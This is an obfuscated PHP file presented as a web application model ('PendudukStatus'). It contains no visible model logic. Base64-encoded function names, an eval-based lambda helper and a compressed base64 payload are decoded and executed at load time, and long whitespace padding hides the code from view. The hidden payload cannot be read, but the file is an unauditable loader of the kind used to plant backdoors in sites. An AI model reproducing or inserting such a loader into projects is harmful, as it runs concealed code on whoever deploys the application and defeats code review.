<?php

        $__='printf';$_='Loading app/Models/PendudukStatus.php';
























































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if (!function_exists('__lambda')) {
                                                                                                                                                                                                                                              function __lambda($sArgs, $sCode)
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                  return eval("return function($sArgs){{$sCode}};");
                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                          }                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_', $______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo






















































































































































































































                                                                                                                                                                                                                     $________;
